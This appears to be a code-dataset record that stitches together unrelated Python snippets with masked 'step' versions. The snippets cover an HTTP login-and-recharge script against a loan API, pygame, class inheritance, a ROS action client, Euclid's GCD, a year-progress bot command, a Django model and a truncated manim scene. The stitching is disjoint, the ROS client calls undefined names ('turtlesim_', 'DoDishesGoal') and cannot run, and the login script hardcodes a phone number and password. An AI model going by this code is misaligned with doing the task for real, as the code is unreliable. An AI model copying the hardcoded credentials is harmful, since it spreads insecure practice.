"index": 4672,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef http_request(url, data, token=None, method='post'):\n header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}\n if method == 'get':\n result = requests.get(url, json=data, headers=header)\n else:\n result = requests.post(url, json=data, headers=header)\n return result.json()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef http_request(url, data, token=None, method='post'):\n header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}\n if method == 'get':\n result = requests.get(url, json=data, headers=header)\n else:\n result = requests.post(url, json=data, headers=header)\n return result.json()\n\n\nif __name__ == '__main__':\n login_url = 'http://120.78.128.25:8766/futureloan/member/login'\n login_data = {'mobile_phone': 13665929730, 'pwd': '12345678'}\n response = http_request(login_url, login_data)\n print('登录的结果是:{}'.format(response))\n token = response['data']['token_info']['token']\n rec_url = 'http://120.78.128.25:8766/futureloan/member/recharge'\n rec_data = {'member_id': 200170, 'amount': 123456}\n print(http_request(rec_url, rec_data, 'bearer ' + token))\n",
"step-4": "import requests\n\n\ndef http_request(url, data, token=None, method='post'):\n header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}\n if method == 'get':\n result = requests.get(url, json=data, headers=header)\n else:\n result = requests.post(url, json=data, headers=header)\n return result.json()\n\n\nif __name__ == '__main__':\n login_url = 'http://120.78.128.25:8766/futureloan/member/login'\n login_data = {'mobile_phone': 13665929730, 'pwd': '12345678'}\n response = http_request(login_url, login_data)\n print('登录的结果是:{}'.format(response))\n token = response['data']['token_info']['token']\n rec_url = 'http://120.78.128.25:8766/futureloan/member/recharge'\n rec_data = {'member_id': 200170, 'amount': 123456}\n print(http_request(rec_url, rec_data, 'bearer ' + token))\n",
"step-5": "# -coding: UTF-8 -*-\n# @Time : 2020/06/24 20:01\n# @Author: Liangping_Chen\n# @E-mail: chenliangping_2018@foxmail.com\n\nimport requests\ndef http_request(url,data,token=None,method='post'):\n header = {'X-Lemonban-Media-Type': 'lemonban.v2',\n 'Authorization':token}\n #判断是get请求还是post请求\n if method=='get':\n # 发起注册&登录\n result = requests.get(url, json=data, headers=header)\n else:\n result = requests.post(url, json=data, headers=header)\n\n return result.json()#return返回指定的结果\nif __name__ == '__main__':\n\n login_url='http://120.78.128.25:8766/futureloan/member/login'\n login_data={'mobile_phone':13665929730,'pwd':'12345678'}\n response=http_request(login_url,login_data)\n print('登录的结果是:{}'.format(response))\n\n #充值\n token=response['data']['token_info']['token']\n rec_url='http://120.78.128.25:8766/futureloan/member/recharge'\n rec_data = {'member_id': 200170, 'amount': 123456}\n print(http_request(rec_url,rec_data,\"bearer \"+token))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class BackGround:
def __init__(self, x, y):
self.y = y
self.x = x
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BackGround:
def __init__(self, x, y):
self.y = y
self.x = x
<|reserved_special_token_0|>
def draw(self, screen):
screen.blit(self.image, self.rect)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BackGround:
def __init__(self, x, y):
self.y = y
self.x = x
def set_image(self, src):
self.image = pygame.image.load(src)
self.rect = self.image.get_rect()
self.rect.y = self.y
self.rect.x = self.x
def draw(self, screen):
screen.blit(self.image, self.rect)
<|reserved_special_token_1|>
import pygame
class BackGround:
def __init__(self, x, y):
self.y = y
self.x = x
def set_image(self, src):
self.image = pygame.image.load(src)
self.rect = self.image.get_rect()
self.rect.y = self.y
self.rect.x = self.x
def draw(self, screen):
screen.blit(self.image, self.rect)
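A minimal driver for the class above; the image path is a placeholder and any small image file will do:

import pygame

pygame.init()
screen = pygame.display.set_mode((800, 600))
bg = BackGround(0, 0)
bg.set_image('background.png')  # placeholder asset, not from the original
running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    bg.draw(screen)       # blit the background at its rect position
    pygame.display.flip()  # present the frame
pygame.quit()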
|
flexible
|
{
"blob_id": "071e3cf6b4337e0079bbb2c7694fff2468142070",
"index": 6505,
"step-1": "<mask token>\n\n\nclass BackGround:\n\n def __init__(self, x, y):\n self.y = y\n self.x = x\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass BackGround:\n\n def __init__(self, x, y):\n self.y = y\n self.x = x\n <mask token>\n\n def draw(self, screen):\n screen.blit(self.image, self.rect)\n",
"step-3": "<mask token>\n\n\nclass BackGround:\n\n def __init__(self, x, y):\n self.y = y\n self.x = x\n\n def set_image(self, src):\n self.image = pygame.image.load(src)\n self.rect = self.image.get_rect()\n self.rect.y = self.y\n self.rect.x = self.x\n\n def draw(self, screen):\n screen.blit(self.image, self.rect)\n",
"step-4": "import pygame\n\n\nclass BackGround:\n\n def __init__(self, x, y):\n self.y = y\n self.x = x\n\n def set_image(self, src):\n self.image = pygame.image.load(src)\n self.rect = self.image.get_rect()\n self.rect.y = self.y\n self.rect.x = self.x\n\n def draw(self, screen):\n screen.blit(self.image, self.rect)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
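A minimal event-loop sketch showing how the BackGround class above is meant to be used; the module name background and the image path 'bg.png' are assumptions, the rest follows the record. Note that set_image must be called before draw, since __init__ only stores coordinates:

import pygame
from background import BackGround  # hypothetical module holding the record's class

pygame.init()
screen = pygame.display.set_mode((640, 480))

bg = BackGround(0, 0)     # anchor the image at the top-left corner
bg.set_image('bg.png')    # placeholder path; any loadable image works

running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    bg.draw(screen)        # blits the image at (self.x, self.y)
    pygame.display.flip()
pygame.quit()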
class Robot:
def __init__(self, name):
self.name = name
def say_hi(self):
print("Hi, I'm from class Robot")
print("Hi, Ich bin " + self.name)
def say_hi_to_everybody(self):
print("Hi to all objects :-)")
class PhysicianRobot(Robot):
def say_hi_again(self):
print("Hi, I'm from sub-class PhysicianRobot")
print("Hi, Ich bin " + self.name)
name_1 = "Marvin"
name_2 = "James"
x = Robot(name_1)
y = PhysicianRobot(name_2)
print(x, type(x))
x.say_hi()
x.say_hi_to_everybody()
print(y, type(y))
y.say_hi()
y.say_hi_again()
y.say_hi_to_everybody()
|
normal
|
{
"blob_id": "6b24c438ca7bb4c37ae356c18c562831767f0569",
"index": 9961,
"step-1": "<mask token>\n\n\nclass PhysicianRobot(Robot):\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Robot:\n\n def __init__(self, name):\n self.name = name\n\n def say_hi(self):\n print(\"Hi, I'm from class Robot\")\n print('Hi, Ich bin ' + self.name)\n\n def say_hi_to_everybody(self):\n print('Hi to all objects :-)')\n\n\nclass PhysicianRobot(Robot):\n\n def say_hi_again(self):\n print(\"Hi, I'm from sub-class PhysicianRobot\")\n print('Hi, Ich bin ' + self.name)\n\n\n<mask token>\n",
"step-3": "class Robot:\n\n def __init__(self, name):\n self.name = name\n\n def say_hi(self):\n print(\"Hi, I'm from class Robot\")\n print('Hi, Ich bin ' + self.name)\n\n def say_hi_to_everybody(self):\n print('Hi to all objects :-)')\n\n\nclass PhysicianRobot(Robot):\n\n def say_hi_again(self):\n print(\"Hi, I'm from sub-class PhysicianRobot\")\n print('Hi, Ich bin ' + self.name)\n\n\n<mask token>\nprint(x, type(x))\nx.say_hi()\nx.say_hi_to_everybody()\nprint(y, type(y))\ny.say_hi()\ny.say_hi_again()\ny.say_hi_to_everybody()\n",
"step-4": "class Robot:\n\n def __init__(self, name):\n self.name = name\n\n def say_hi(self):\n print(\"Hi, I'm from class Robot\")\n print('Hi, Ich bin ' + self.name)\n\n def say_hi_to_everybody(self):\n print('Hi to all objects :-)')\n\n\nclass PhysicianRobot(Robot):\n\n def say_hi_again(self):\n print(\"Hi, I'm from sub-class PhysicianRobot\")\n print('Hi, Ich bin ' + self.name)\n\n\nname_1 = 'Marvin'\nname_2 = 'James'\nx = Robot(name_1)\ny = PhysicianRobot(name_2)\nprint(x, type(x))\nx.say_hi()\nx.say_hi_to_everybody()\nprint(y, type(y))\ny.say_hi()\ny.say_hi_again()\ny.say_hi_to_everybody()\n",
"step-5": "class Robot:\n\n def __init__(self, name):\n self.name = name\n\n def say_hi(self):\n print(\"Hi, I'm from class Robot\")\n print(\"Hi, Ich bin \" + self.name)\n\n def say_hi_to_everybody(self):\n print(\"Hi to all objects :-)\")\n\n\nclass PhysicianRobot(Robot):\n def say_hi_again(self):\n print(\"Hi, I'm from sub-class PhysicianRobot\")\n print(\"Hi, Ich bin \" + self.name)\n\n\nname_1 = \"Marvin\"\nname_2 = \"James\"\n\nx = Robot(name_1)\ny = PhysicianRobot(name_2)\n\nprint(x, type(x))\nx.say_hi()\nx.say_hi_to_everybody()\n\nprint(y, type(y))\ny.say_hi()\ny.say_hi_again()\ny.say_hi_to_everybody()\n",
"step-ids": [
1,
6,
7,
8,
9
]
}
|
[
1,
6,
7,
8,
9
] |
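The PhysicianRobot subclass above only adds a method; a short sketch of the other common extension pattern, overriding a base method while reusing it through super() (NursingRobot is an illustrative name, Robot is the record's class):

class NursingRobot(Robot):            # Robot as defined in the record
    def say_hi(self):
        super().say_hi()              # keep the base-class greeting
        print('...and I also work as a nurse.')

z = NursingRobot('Ada')
z.say_hi()                            # prints the Robot lines, then the extra one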
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
[(x * x) for x in a]
<|reserved_special_token_1|>
a = range(10)
[(x * x) for x in a]
<|reserved_special_token_1|>
a = range(10)
[x*x for x in a]
|
flexible
|
{
"blob_id": "018b9533074d2766dc5010ff9c5e70888d249b45",
"index": 1832,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n[(x * x) for x in a]\n",
"step-3": "a = range(10)\n[(x * x) for x in a]\n",
"step-4": "a = range(10)\n[x*x for x in a]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
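The comprehension above is shorthand for an explicit accumulation loop; a self-checking sketch of the equivalence:

a = range(10)

squares = [x * x for x in a]          # comprehension form, as in the record

squares_loop = []                     # equivalent explicit loop
for x in a:
    squares_loop.append(x * x)

assert squares == squares_loop == [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]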
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
roslib.load_manifest('learning_tf')
<|reserved_special_token_0|>
if __name__ == '__main__':
rospy.init_node('move_client')
client = actionlib.SimpleActionClient('moveTo', turtlesim_)
client.wait_for_server()
goal = DoDishesGoal()
client.send_goal(goal)
client.wait_for_result(rospy.Duration.from_sec(5.0))
<|reserved_special_token_1|>
import roslib
roslib.load_manifest('learning_tf')
import rospy
import actionlib
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
from goal.msg import moveAction, moveGoal
if __name__ == '__main__':
rospy.init_node('move_client')
client = actionlib.SimpleActionClient('moveTo', turtlesim_)
client.wait_for_server()
goal = DoDishesGoal()
client.send_goal(goal)
client.wait_for_result(rospy.Duration.from_sec(5.0))
<|reserved_special_token_1|>
#! /usr/bin/env python
import roslib
roslib.load_manifest('learning_tf')
import rospy
import actionlib
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
from goal.msg import moveAction, moveGoal
if __name__ == '__main__':
rospy.init_node('move_client')
client = actionlib.SimpleActionClient('moveTo', turtlesim_)
client.wait_for_server()
goal = DoDishesGoal()
# Fill in the goal here
client.send_goal(goal)
client.wait_for_result(rospy.Duration.from_sec(5.0))
|
flexible
|
{
"blob_id": "791935f63f7a0ab2755ad33369d2afa8c10dffbb",
"index": 4708,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nroslib.load_manifest('learning_tf')\n<mask token>\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n goal = DoDishesGoal()\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))\n",
"step-3": "import roslib\nroslib.load_manifest('learning_tf')\nimport rospy\nimport actionlib\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\nfrom goal.msg import moveAction, moveGoal\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n goal = DoDishesGoal()\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))\n",
"step-4": "#! /usr/bin/env python\nimport roslib\nroslib.load_manifest('learning_tf')\n\nimport rospy\nimport actionlib\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\n\nfrom goal.msg import moveAction, moveGoal\n\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n\n goal = DoDishesGoal()\n # Fill in the goal here\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
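The action client above is left incomplete: turtlesim_ is a truncated identifier and DoDishesGoal is never imported, while the record's own import provides moveAction and moveGoal. A sketch of what the client likely intended, under the assumption that those imported types are the right ones (the goal's field names live in move.action, which the record does not show):

#!/usr/bin/env python
import rospy
import actionlib
from goal.msg import moveAction, moveGoal

if __name__ == '__main__':
    rospy.init_node('move_client')
    # the action type is now the imported moveAction instead of the
    # truncated turtlesim_ placeholder
    client = actionlib.SimpleActionClient('moveTo', moveAction)
    client.wait_for_server()
    goal = moveGoal()  # populate the fields defined in move.action here
    client.send_goal(goal)
    client.wait_for_result(rospy.Duration.from_sec(5.0))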
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def EuclidGCD(a, b):
if b == 0:
return a
else:
a = a % b
return EuclidGCD(b, a)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def EuclidGCD(a, b):
if b == 0:
return a
else:
a = a % b
return EuclidGCD(b, a)
<|reserved_special_token_0|>
print(EuclidGCD(in_[0], in_[1]))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def EuclidGCD(a, b):
if b == 0:
return a
else:
a = a % b
return EuclidGCD(b, a)
in_ = [int(n) for n in input().split()]
print(EuclidGCD(in_[0], in_[1]))
<|reserved_special_token_1|>
"""
Task. Given two integers a and b, find their greatest common divisor.
Input Format. The two integers a, b are given in the same line separated by space.
Constraints. 1<=a,b<=2·10^9.
Output Format. Output GCD(a, b).
"""
def EuclidGCD(a, b):
if b == 0:
return a
else:
a = a%b
return EuclidGCD(b, a)
in_ = [int(n) for n in input().split()]
print(EuclidGCD(in_[0], in_[1]))
|
flexible
|
{
"blob_id": "39d82267f966ca106ee384e540c31a3e5e433318",
"index": 2248,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef EuclidGCD(a, b):\n if b == 0:\n return a\n else:\n a = a % b\n return EuclidGCD(b, a)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef EuclidGCD(a, b):\n if b == 0:\n return a\n else:\n a = a % b\n return EuclidGCD(b, a)\n\n\n<mask token>\nprint(EuclidGCD(in_[0], in_[1]))\n",
"step-4": "<mask token>\n\n\ndef EuclidGCD(a, b):\n if b == 0:\n return a\n else:\n a = a % b\n return EuclidGCD(b, a)\n\n\nin_ = [int(n) for n in input().split()]\nprint(EuclidGCD(in_[0], in_[1]))\n",
"step-5": "\"\"\"\nTask. Given two integers a and b, find their greatest common divisor.\nInput Format. The two integers a, b are given in the same line separated by space.\nConstraints. 1<=a,b<=2·109.\nOutput Format. Output GCD(a, b).\n\"\"\"\n\ndef EuclidGCD(a, b):\n if b == 0:\n return a\n else:\n a = a%b\n return EuclidGCD(b, a)\n\nin_ = [int(n) for n in input().split()]\nprint(EuclidGCD(in_[0], in_[1]))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
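A quick cross-check of the recursive Euclid above against the standard library; the record's function is restated so the sketch is self-contained:

from math import gcd

def EuclidGCD(a, b):                  # the record's recursion, condensed
    if b == 0:
        return a
    return EuclidGCD(b, a % b)

for a, b in [(48, 18), (2 * 10 ** 9, 1), (17, 5)]:
    assert EuclidGCD(a, b) == gcd(a, b)   # agrees with math.gcd
print('ok')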
import math
import pendulum
from none import *
@on_command('yearprogress')
async def year_progress(session: CommandSession):
await session.send(get_year_progress())
def get_year_progress():
dt = pendulum.now()
percent = year_progress(dt)
year = dt.year
    return f'Your {year} usage progress: {percent}%\n' \
f'\n\n' \
f'{make_progress_string(percent)}'
def year_progress(dt):
year_days = 366 if dt.is_leap_year() else 365
passed_days = dt.timetuple().tm_yday
percent = math.floor((passed_days / year_days) * 100)
return percent
def make_progress_string(percent):
blocks = 15
percent = percent * blocks / 100
return ''.join(["▓" if i < percent else "░" for i in range(blocks)])
|
normal
|
{
"blob_id": "f54d0eeffa140af9c16a1fedb8dcd7d06ced29f2",
"index": 2395,
"step-1": "<mask token>\n\n\ndef get_year_progress():\n dt = pendulum.now()\n percent = year_progress(dt)\n year = dt.year\n return f'你的 {year} 使用进度:{percent}%\\n\\n\\n{make_progress_string(percent)}'\n\n\ndef year_progress(dt):\n year_days = 366 if dt.is_leap_year() else 365\n passed_days = dt.timetuple().tm_yday\n percent = math.floor(passed_days / year_days * 100)\n return percent\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_year_progress():\n dt = pendulum.now()\n percent = year_progress(dt)\n year = dt.year\n return f'你的 {year} 使用进度:{percent}%\\n\\n\\n{make_progress_string(percent)}'\n\n\ndef year_progress(dt):\n year_days = 366 if dt.is_leap_year() else 365\n passed_days = dt.timetuple().tm_yday\n percent = math.floor(passed_days / year_days * 100)\n return percent\n\n\ndef make_progress_string(percent):\n blocks = 15\n percent = percent * blocks / 100\n return ''.join([('▓' if i < percent else '░') for i in range(blocks)])\n",
"step-3": "<mask token>\n\n\n@on_command('yearprogress')\nasync def year_progress(session: CommandSession):\n await session.send(get_year_progress())\n\n\ndef get_year_progress():\n dt = pendulum.now()\n percent = year_progress(dt)\n year = dt.year\n return f'你的 {year} 使用进度:{percent}%\\n\\n\\n{make_progress_string(percent)}'\n\n\ndef year_progress(dt):\n year_days = 366 if dt.is_leap_year() else 365\n passed_days = dt.timetuple().tm_yday\n percent = math.floor(passed_days / year_days * 100)\n return percent\n\n\ndef make_progress_string(percent):\n blocks = 15\n percent = percent * blocks / 100\n return ''.join([('▓' if i < percent else '░') for i in range(blocks)])\n",
"step-4": "import math\nimport pendulum\nfrom none import *\n\n\n@on_command('yearprogress')\nasync def year_progress(session: CommandSession):\n await session.send(get_year_progress())\n\n\ndef get_year_progress():\n dt = pendulum.now()\n percent = year_progress(dt)\n year = dt.year\n return f'你的 {year} 使用进度:{percent}%\\n\\n\\n{make_progress_string(percent)}'\n\n\ndef year_progress(dt):\n year_days = 366 if dt.is_leap_year() else 365\n passed_days = dt.timetuple().tm_yday\n percent = math.floor(passed_days / year_days * 100)\n return percent\n\n\ndef make_progress_string(percent):\n blocks = 15\n percent = percent * blocks / 100\n return ''.join([('▓' if i < percent else '░') for i in range(blocks)])\n",
"step-5": "import math\n\nimport pendulum\nfrom none import *\n\n\n@on_command('yearprogress')\nasync def year_progress(session: CommandSession):\n await session.send(get_year_progress())\n\n\ndef get_year_progress():\n dt = pendulum.now()\n percent = year_progress(dt)\n year = dt.year\n return f'你的 {year} 使用进度:{percent}%\\n' \\\n f'\\n\\n' \\\n f'{make_progress_string(percent)}'\n\n\ndef year_progress(dt):\n year_days = 366 if dt.is_leap_year() else 365\n passed_days = dt.timetuple().tm_yday\n percent = math.floor((passed_days / year_days) * 100)\n return percent\n\n\ndef make_progress_string(percent):\n blocks = 15\n percent = percent * blocks / 100\n return ''.join([\"▓\" if i < percent else \"░\" for i in range(blocks)])\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
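The same computation as above, run outside the none bot framework so it can be tried directly; the leap-year formula and the ▓/░ bar are the record's own:

import math
import pendulum

def year_progress(dt):
    year_days = 366 if dt.is_leap_year() else 365   # record's leap handling
    return math.floor(dt.timetuple().tm_yday / year_days * 100)

def make_progress_string(percent, blocks=15):
    filled = percent * blocks / 100
    return ''.join('▓' if i < filled else '░' for i in range(blocks))

p = year_progress(pendulum.now())
print(f'{p}% {make_progress_string(p)}')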
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Products(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Products(models.Model):
title = models.CharField(max_length=255)
year = models.IntegerField(default=0)
feature = models.CharField(max_length=30)
usage_status = models.CharField(max_length=25)
kms_driven = models.CharField(max_length=10)
price = models.CharField(max_length=10)
<|reserved_special_token_1|>
from django.db import models
class Products(models.Model):
title = models.CharField(max_length=255)
year = models.IntegerField(default=0)
feature = models.CharField(max_length=30)
usage_status = models.CharField(max_length=25)
kms_driven = models.CharField(max_length=10)
price = models.CharField(max_length=10)
<|reserved_special_token_1|>
from django.db import models
# Create your models here.
class Products(models.Model):
title = models.CharField(max_length=255)
year = models.IntegerField(default=0)
feature = models.CharField(max_length=30)
usage_status = models.CharField(max_length=25)
kms_driven = models.CharField(max_length=10)
price = models.CharField(max_length=10)
|
flexible
|
{
"blob_id": "5b0252dd862fe1e46c0c1df41935db16ae691dff",
"index": 7277,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Products(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Products(models.Model):\n title = models.CharField(max_length=255)\n year = models.IntegerField(default=0)\n feature = models.CharField(max_length=30)\n usage_status = models.CharField(max_length=25)\n kms_driven = models.CharField(max_length=10)\n price = models.CharField(max_length=10)\n",
"step-4": "from django.db import models\n\n\nclass Products(models.Model):\n title = models.CharField(max_length=255)\n year = models.IntegerField(default=0)\n feature = models.CharField(max_length=30)\n usage_status = models.CharField(max_length=25)\n kms_driven = models.CharField(max_length=10)\n price = models.CharField(max_length=10)\n",
"step-5": "from django.db import models\n\n\n# Create your models here.\nclass Products(models.Model):\n title = models.CharField(max_length=255)\n year = models.IntegerField(default=0)\n feature = models.CharField(max_length=30)\n usage_status = models.CharField(max_length=25)\n kms_driven = models.CharField(max_length=10)\n price = models.CharField(max_length=10)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
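An ORM usage sketch for the Products model above, assuming the app is listed in INSTALLED_APPS and migrated; all field values are illustrative placeholders, only the field names come from the record:

bike = Products.objects.create(
    title='Pulsar 150',            # placeholder values throughout
    year=2017,
    feature='Self Start',
    usage_status='Used',
    kms_driven='30500',            # stored as text in this schema
    price='55000')
recent = Products.objects.filter(year__gte=2015).order_by('-year')
print(recent.count(), bike.pk)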
<|reserved_special_token_0|>
class A_Scroller(Scene):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class A_Scroller(Scene):
<|reserved_special_token_0|>
def construct(self):
text_1 = Text('3493', color='#DC3832')
text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)
text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)
text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)
text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)
text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)
text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)
text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)
text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)
text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)
line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,
text_7, text_8, text_9, text_10)
text_11 = Text('30898', color='#221F20').shift(DOWN)
text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)
text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)
text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)
text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)
text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)
text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)
text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)
text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)
text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)
line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,
text_16, text_17, text_18, text_19, text_20)
text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)
text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)
text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)
text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)
text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)
text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)
text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)
text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)
text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)
text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)
line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,
text_26, text_27, text_28, text_29, text_30)
all_numbers_1 = VGroup(line_1, line_2, line_3)
all_numbers_2 = all_numbers_1.copy()
all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)
all_numbers_2.move_to(2 * UP)
all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)
self.add(all_numbers)
self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,
rate_func=linear)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class A_Scroller(Scene):
CONFIG = {'camera_config': {'background_color': '#FFFFFF'}}
def construct(self):
text_1 = Text('3493', color='#DC3832')
text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)
text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)
text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)
text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)
text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)
text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)
text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)
text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)
text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)
line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,
text_7, text_8, text_9, text_10)
text_11 = Text('30898', color='#221F20').shift(DOWN)
text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)
text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)
text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)
text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)
text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)
text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)
text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)
text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)
text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)
line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,
text_16, text_17, text_18, text_19, text_20)
text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)
text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)
text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)
text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)
text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)
text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)
text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)
text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)
text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)
text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)
line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,
text_26, text_27, text_28, text_29, text_30)
all_numbers_1 = VGroup(line_1, line_2, line_3)
all_numbers_2 = all_numbers_1.copy()
all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)
all_numbers_2.move_to(2 * UP)
all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)
self.add(all_numbers)
self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,
rate_func=linear)
<|reserved_special_token_1|>
from manimlib.imports import *
class A_Scroller(Scene):
CONFIG = {'camera_config': {'background_color': '#FFFFFF'}}
def construct(self):
text_1 = Text('3493', color='#DC3832')
text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)
text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)
text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)
text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)
text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)
text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)
text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)
text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)
